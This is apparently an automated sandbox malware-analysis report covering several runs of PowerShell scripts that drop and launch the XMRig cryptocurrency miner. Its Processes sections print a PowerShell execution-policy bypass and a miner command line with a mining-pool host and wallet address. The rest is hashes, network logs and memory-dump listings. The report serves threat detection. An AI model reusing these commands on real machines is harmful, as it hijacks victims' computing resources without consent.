memory/5064-9-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_id1u1z21.k41.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5064-10-0x0000022346EF0000-0x0000022346F12000-memory.dmp

memory/5064-11-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

memory/5064-12-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

memory/5064-13-0x00007FFA49493000-0x00007FFA49495000-memory.dmp

memory/5064-14-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:07

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/3376-0-0x00007FF840123000-0x00007FF840124000-memory.dmp

memory/3376-5-0x0000025411240000-0x0000025411262000-memory.dmp

memory/3376-6-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-9-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-10-0x00000254299F0000-0x0000025429A66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpiy4bqc.les.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3376-25-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-48-0x0000025429B90000-0x0000025429BA2000-memory.dmp

memory/3376-61-0x0000025429760000-0x000002542976A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4380-90-0x000001A5500E0000-0x000001A550100000-memory.dmp

memory/4380-91-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/3376-93-0x00007FF840123000-0x00007FF840124000-memory.dmp

memory/3376-94-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/4380-92-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/3376-95-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/3376-96-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

memory/4380-97-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-98-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-99-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-100-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-101-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-102-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-103-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-104-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-105-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-106-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-107-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-108-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-109-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-110-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-111-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-112-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-113-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-114-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-115-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-116-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-117-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-118-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-119-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-120-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-121-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-122-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-123-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-124-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-125-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-126-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-127-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-128-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-129-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-130-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-131-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-132-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-133-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-134-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-135-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-136-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-137-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-138-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-139-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-140-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-141-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-142-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-143-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-144-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-145-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-146-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-147-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-148-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-149-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-150-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-151-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-152-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-153-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-154-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-155-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-156-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

memory/4380-157-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:08

Platform

win10-20240404-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/2836-3-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp

memory/2836-5-0x0000018FEC690000-0x0000018FEC6B2000-memory.dmp

memory/2836-8-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2836-9-0x0000018FEC890000-0x0000018FEC906000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rp2ujln0.zhu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2836-10-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2836-25-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2836-48-0x0000018FEC840000-0x0000018FEC852000-memory.dmp

memory/2836-61-0x0000018FEC820000-0x0000018FEC82A000-memory.dmp

memory/2836-83-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp

memory/2836-89-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2352-92-0x000001F42DBB0000-0x000001F42DBD0000-memory.dmp

memory/2352-93-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2836-94-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2352-95-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-96-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-97-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-98-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-99-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-100-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-101-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-102-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-103-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-104-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-105-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-106-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-107-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-108-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-109-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-110-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-111-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-112-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-113-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-114-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-115-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-116-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-117-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-118-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-119-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-120-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-121-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-122-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-123-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-124-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-125-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-126-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-127-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-128-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-129-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-130-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-131-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-132-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-133-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-134-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-135-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-136-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-137-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-138-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-139-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-140-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-141-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-142-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-143-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-144-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-145-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-146-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-147-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-148-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-149-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-150-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-151-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-152-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-153-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-154-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-155-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-156-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:12

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 52.111.229.48:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4880-4-0x00007FFA64193000-0x00007FFA64194000-memory.dmp

memory/4880-5-0x000001E940F90000-0x000001E940FB2000-memory.dmp

memory/4880-6-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

memory/4880-9-0x000001E9595C0000-0x000001E959636000-memory.dmp

memory/4880-10-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2vyj2g2.zjo.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4880-25-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

memory/4880-48-0x000001E941040000-0x000001E941052000-memory.dmp

memory/4880-61-0x000001E941020000-0x000001E94102A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3256-90-0x000001839B300000-0x000001839B320000-memory.dmp

memory/3256-91-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-92-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/4880-93-0x00007FFA64193000-0x00007FFA64194000-memory.dmp

memory/4880-94-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

